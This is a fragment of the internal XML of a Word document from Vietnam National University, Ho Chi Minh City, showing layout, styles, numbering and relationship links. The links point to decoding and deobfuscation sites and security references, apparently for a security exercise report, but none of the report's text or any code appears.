                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                        </wpg:grp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104775</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>19050</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2983965" cy="2403652"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="108" name="image118.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image118.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId1"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2983965" cy="2403652"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
        <w:b/>
      </w:rPr>
      <w:t>Đại học Quốc gia Thành phố Hồ Chí Minh</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="5CA6F670" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>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6EB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08D057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832E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CAAB1C6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Muc-I"/>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6D4664"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F303D0E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Hinh"/>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F74DDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11A2BE7C"/>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99511FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="827C7112"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Muc-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DF20C98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C447202"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading2"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1004"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26B22A09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C563094"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Bc"/>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00B5B0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBF65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A5D037F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E9C4884"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Heading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18255137">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="934094957">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1192572550">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1864782082">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1316760663">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="428162124">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="337192037">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2076274614">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="310184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6539"/>
    <w:rsid w:val="005402EA"/>
    <w:rsid w:val="007913DC"/>
    <w:rsid w:val="00CD6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962CA"/>
  <w15:docId w15:val="{18BFFB58-40E2-47D0-A2E6-74D324B80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Neo Sans Intel" w:eastAsia="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel" w:cs="UTM Neo Sans Intel"/>
        <w:color w:val="212120"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
        <w:lang w:val="en-US"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rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:kern w:val="28"/>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semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00411B96"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>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pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:sz w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Muc-1">
    <w:name w:val="Muc-1"/>
    <w:basedOn w:val="Muc-I"/>
    <w:link w:val="Muc-1Char"/>
    <w:rsid w:val="000C7F39"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:ind w:left="90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deobfuscatejavascript.com/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://deobfuscatejavascript.com/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.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117.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.base64decode.org/" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.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www.w3schools.com/php/phptryit.asp?filename=tryphp_func_string_bin2hex" TargetMode="Externa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18.195.173.237:4444/" TargetMode="External"/><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hyperlink" Target="https://deobfuscate.io/" TargetMode="External"/><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hyperlink" Target="https://morsedecoder.com/" TargetMode="External"/><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hyperlink" Target="https://morsedecoder.com/"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1.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11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obfuscatejavascript.com/" TargetMode="Externa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4.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.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deobfuscatejavascript.com/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:1234@mail.com" TargetMode="External"/><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08.png"/><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hyperlink" Target="https://github.com/arthaud/git-dumper"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09.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://deobfuscatejavascript.com/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.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hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Language" TargetMode="External"/><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37.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Type%20Juggling" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://deobfuscatejavascript.com/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://deobfuscatejavascript.com/" TargetMode="External"/><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hyperlink" Target="http://18.195.173.237:8585/" TargetMode="External"/><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hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Language" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://deobfuscatejavascript.com/" TargetMode="External"/><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115.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/></Relationships>
</file>

<file path=word/_rels/header1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/></Relationships>
</file>

<file path=word/_rels/header2.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NMygHmYxmcRqzCwhVDShCL1pPA==">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3657</Words>
  <Characters>20848</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>173</Lines>
  <Paragraphs>48</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>24457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Joanna Hartvickson</dc:creator>
  <cp:lastModifiedBy>Võ Anh Kiệt</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2023-03-24T09:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-11T04:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-24T09:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>